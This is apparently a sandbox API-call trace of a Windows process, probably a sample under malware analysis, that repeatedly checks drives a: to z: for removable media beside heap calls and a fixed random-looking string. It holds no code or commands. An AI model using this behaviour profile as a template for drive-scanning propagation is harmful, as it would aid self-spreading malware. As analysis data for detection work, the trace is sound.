HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.520] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.520] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.520] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.520] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.520] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0214.521] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.521] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7b0 [0214.521] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.521] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.521] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.521] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.522] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.522] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.522] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.522] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.522] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.522] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.522] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.523] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.523] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.523] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.523] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.523] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.523] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.524] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.524] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.524] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.524] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.524] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.524] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.525] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.525] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.525] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.525] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.525] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7b0 | out: hHeap=0x12c0000) returned 1 [0214.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.525] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.526] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f20 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.526] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f20 | out: hHeap=0x12c0000) returned 1 [0214.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.526] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e100 [0214.526] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.526] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e100 | out: hHeap=0x12c0000) returned 1 [0214.526] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.527] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.527] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318d98 [0214.527] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318d98 | out: hHeap=0x12c0000) returned 1 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.527] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.527] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.527] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.528] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0214.528] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.528] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.528] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.528] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.528] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.528] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.528] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.529] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.529] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.529] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.529] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.529] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.529] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.530] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.530] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.530] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.530] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.530] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.530] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.530] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.531] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.531] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.531] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.531] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.531] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.531] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.531] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec18 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.532] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.532] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1326040 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.532] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0214.532] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0214.532] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.532] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0214.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.533] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.533] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.533] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.533] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd340 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.533] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.533] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.533] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.533] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.534] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.534] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.534] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.534] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.534] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.535] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.535] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.535] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.535] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.535] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.535] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.535] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.536] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.536] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.536] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.536] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.536] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.536] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.536] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.536] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.537] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.537] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.537] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.537] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.537] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.538] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1326040 [0214.538] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.538] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0214.539] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.539] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.539] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0214.539] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.539] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.539] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.539] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.539] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.539] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.540] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.541] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.541] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.541] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.541] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.542] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.542] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 